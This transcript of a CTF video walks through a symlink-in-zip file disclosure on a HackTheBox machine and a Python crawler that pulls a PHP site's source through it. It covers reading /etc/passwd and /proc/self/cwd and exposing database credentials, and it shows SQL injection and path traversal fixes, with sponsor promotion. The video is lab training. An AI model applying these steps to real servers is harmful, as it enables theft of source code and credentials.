{"text": "what's going on YouTube this is ipsec and today we're going to do something a little bit different and that is do a cliffnote version of a stream I did a couple days ago where we created a python application that would take a file disclosure vulnerability and use that to crawl the website and why would you crawl a website after a file disclosure vulnerability because that's allowing you to extract the website Source in this case it was a PHP app if we just did a standard web crawler we just get the HTML we don't get the source code but this will enable us to get the source code of the app so then we can easily find vulner abilities so this video is going to be a cliff note of everything we did there I'm going to shrink myself and let's go over the actual vulnerability real quick right um in the zipping box for I hack the Box", "start": 0.24, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "there's a file disclosure vulnerability it's a little bit weird the application accept zip files and inside the zip file there's a PDF it only enforces the extension it can be anything um like any type of text and once you upload it it will allow you to access that file right so let's just walk through this real quick I'm going to make a directory called zip and then let's just touch or we can Echo please subscribe to um test.pdf and then we can zip package. zip here so now we have a zip file that just contains um test.pdf and I think that was an unsupported command but that should be fine um apparently I don't know how to use seven zip off the top of my head so if I upload package. zip we go here I'm going to curl this and we get Please Subscribe it doesn't display here because the mime type tells my browser it's a PDF I bet", "start": 42.28, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "if I did a-v uh we can see content type there right so that's why my browser isn't displaying it so the vulnerability is you can put a SIM Link in a zip so let's delete everything here and I'm going to create a symbolic link of etsy passwd and I'm going to call it test.pdf if I look at this we have it pointed there now if we do a help on zip there's this Dy and that's going to store the symbolic link so if I just zip this up so I'm going to do zip um package do zip on this file let's make directory called out real quick and we'll unzip it we see it didn't get the SIM link um the contents are my Etsy passwd we can see IPC right there um if we wanted to make it follow the Sim link and again lsla on out lsla here you know it's a Sim link because it's got this Arrow so I'm going to delete everything out of", "start": 104.759, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "out we're going to do that zip command again but specify Dy so now if I go into out we do the same zip command we see zip is telling us it processed a symbolic link if I do it lsla we can see the symbolic link followed right so now if I upload that new package. zip I think I put it oh no it's in here and then we grab this file we have the Etsy passwd off the server we know it's off the server because you don't see IPC near the bottom so if we wanted to extract a bunch of files this way it's kind of a pain right so in the video I had created a python application let me open it up let's do code dot to automate that and when I create the python application in the hack the Box video I only did it so we could download files one at a time right so this is the file um we have the create zip this nastiness is just how", "start": 168.72, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "you can add a Sim link and a zip I'm sure there's a cleaner way to do it but hey it worked right so we have a way to download files one at a time so I do Python 3 fdp ety passwd it works awesome but this is a big pain because we have to just guess at a lot of the files right so if I do like ver dubdub dub HTML index.php we can get it if you want to know how I knew it was that um we could leak get out of like Etsy Apache 2 sites enabled and then the default is 00- default. comp for Apache and that will leak where the document route is if this was a um production server and they were doing like um virtual host routing we'd probably want to get every host name out of etsy host and normally the file wouldn't be 000000 default it would probably be like zipping Doom something out of that host file.com um but that is ways you could", "start": 239.92, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "get the document rout which is where your script lies the alternative is a lot of times you can just use the proc self CWD directory right this will also work so we can get proc self CWD and get the file there that's going to be the current working directory of the current process and in websites normally it's going to be the web rout so that's a really handy way of just going to the web rout now if I wanted to like start downloading the source code there's a lot of files I have to download and a lot of going through it's just going to be painful right um we'd have to go like index.php I think um there's upload.php and then we'd read this source code find a different PHP file and download that that's it's just going to take hours probably to download everything so that's where having a crawler comes in", "start": 302.639, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "handy and I created this pone closure on stream and we'll go over the code in a minute but I want to just kind of run it real quick so let's just run it so you can see the benefit and then we do like talking about the code and then and the video so I'm going to run pone closure and it's just going to start downloading everything see we had it crawl it found links off index.php and starts downloading them and if I go into the output directory uh we got proc self CWD I probably shouldn't have logged all of that but hey we have the files we have the entire web source of this application at least I think I grabbed every file so what this enables us to do is just open up visual studio code on the web route and this is going to allow us to access the application just as if we did like a get pull or something", "start": 351.72, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "right we just have all the source code at our fingertips even like all the CSS and JavaScript if we wanted it but we could just run the application ourselves if we had um the database up and running right we see the database config here we get the MySQL password but what's really cool when you download this is we just did the file disclosure of volner ability we downloaded the web source and we have the sneak plugin installed in visual studio so it's going to go and scan our code and tell us where the vulnerabilities are right and sneak is today's web sponsor if you didn't know what sneak is um it's a platform that will scan your code uh dependencies containers all in real time to help you find and fix vulnerabilities right we have the open source security scanner which isn't going to work for this", "start": 406.759, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "application because it's just vanilla PHP if it was like lural or python that had like requirements. text it would be able to scan all those um files for vulnerabilities you have some code quality things it's going to point out in like jQuery how we can fix it and make a code a little bit more readable always gives some recommendations on how to fix it so let's just go to the cool stuff and the vulnerabilities if we go to product.php there's an SQL injection right here we can see we're doing a prepare statement but because um we just passed the parameter here instead of doing it in the correct way I know I talked about in my hack the Box video for it but I want to say we'd put a question mark and then you'd say ID like this um because it wasn't done this way it discovers it is vulnerable right what", "start": 453.84, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "if I save this if it will automatically find that this file is no longer vulnerable that's the one thing I really like about is once we do it it says oh you fixed that function no more vulnerabilities awesome let's go to like um index.php there's a file inclusion let's fix the path Traverse of vulnerability right so in this it's talking about the rename functionality right here um but it tells us all the lines where became user input right so if we look here 54 that is highlighted here um and if we look look at how it wants us to fix it it probably wants us to use the base name functionality so let's go up here where we first declare file name and I'll just say base name put that there and it'll automatically rescan the code and we no longer see the file disclosure vulnerability right or the pth reversal", "start": 502.12, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "they called it right so that is um sneak in a nutshell I'd highly recommend checking it out if you haven't seen it before go to snak.io this is a referral link best way to support me is going here signing up to the platform in trying it out I definitely do love it I don't do sponsors here that often so you know I really enjoy the product when I give it a shout out right so let's now um go into how pone closure works so I'm going to go to I'm trying to think of a good way so we'll start down here I do an import FD and then we say start crawl and then I pass in a function to a function this is something I don't do that often but here where we do start crawl we can pass in this function and what that enables us to do is easily swap out the file disclosure vulnerability right this one I had file", "start": 562.56, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "disclosure and a zip but a different one I just have to create a function that will perform the file disclosure vulnerability give the output as a text and then I swap this function out and we're good to go it'll start crawling right so I try to make this so we make as minimal changes as possible to adapt it to other web applications if I get bored enough or there's a lot of request we can extend it to different um languages right now it's just a PHP thing so let's go into how this works um first off we're setting a variable this is a set and sets are very much kind of like a list and this is where a lot of the debugging on stream came in the main difference here is set will not allow a duplicate so uh we had a lot of duplicate file downloads that we were trying to troubleshoot at the end of the", "start": 616.76, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "day I just made everything a set so duplicates couldn't be added we declare crawled right up the St start because this is recursive we don't want to crawl the same page twice so whenever we crawl a page we add it to um the set the queue this is going to be all the files we want to download right it's going to start off with just that one file that we specified index.php but then it finds links on in index.php and goes and downloads them so while we have data in our queue we're going to take the first item off delete it assign it to this variable and we're going to say we're downloading this page then we're going to add it to the crawled so we know we have downloaded the page and we're going to assign the full path and then we're going to call the function that we passed in that's going to be this", "start": 665.839, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "download file function specifying the full path then we're going to save it and then after that we're going to call get links if you want to look at save all it does is open up output on the directory make the directory and write it nothing fancy there but what the next function is going to do get links this is going to find all the links on the page so we're looking for something that begins with HF equals Source equals or include space then we're looking for a quote and then this is going to be like our file name we accept numbers letters a hyphen a underscore um a slash and a period and we go until one of those characters doesn't match and that's it um it's going to grab the match because it's in these parentheses right so that is the regular expression here it's going to add the link and if a period isn't found", "start": 714.839, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "the reason why that one was there is because there was a directory um that would just just say hre equals shop I want to say it was let's go to index. uh PHP here let's just do shop so this link was just pointing us to the shop directory now Apache automically appended index.php for us but because with the file disclosure vulnerability we don't have Apache helping us out that much so we had to specify index.php so if there isn't a um extension on the file it just assumes it's a directory and goes ahead and makes index.php so that's what that is doing so we add the link and then there was something slightly different if we go to this page this is where a um different vulnerability lies let's see if we go to the shop and click on it we have this page variable and that's going to load product.php so if I go to like", "start": 774.0, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "product.php it pulls it up so that next drag X is going to look for page equals and then the name and because we know the web service appending PHP it's going to um do that for us if it finds a page that doesn't have an extension it's just going to append PHP unlike before where it appended SL index.php this just does.", "start": 837.639, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "PHP because we have the file name and then we return all the links that it found so we called get links now we're going to go through each link if we have a slash on the beginning of the link we're just going to remove it because we don't want it and that could create a lot of duplicates and we can go into some weird Loop where we just keep getting another slash I saw once when we like got slash stop then we got oh man that's annoying uh we go we got SL static method and it just kept going down this Loop of keep doing another slash so I just said you know what we're going to kill the slashes we'll do an L strip um then we're looking for if slash is in page and if it is that means we were in a directory when we hit it so that would mean we were in shop like we're in this index.php the page has shop index.php it", "start": 860.199, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}} {"text": "found functions.php so we didn't want to just save functions.php we wanted to save shopf functions.php so that's why we Preen the um directory there if it ends with two periods we just continue because that was a weird case I don't know exactly what happened there but we never want to get to dot dots right we could probably even do like contains dot dot or something we don't need ends with um and then we have finally the link is not in the crawled set let's go ahead and add it to our queue um and I have a debug statement here if we wanted to debug it but that is the script so hope you guys enjoyed it definitely big shout out to sneak for sponsoring this video take care and I will see you all next time", "start": 912.36, "duration": 0.0, "meta": {"video_id": "WakZS2BhVfs", "title": "Automating a File Disclosure Vulnerability to Crawl Website Source", "url": "https://www.youtube.com/watch?v=WakZS2BhVfs"}}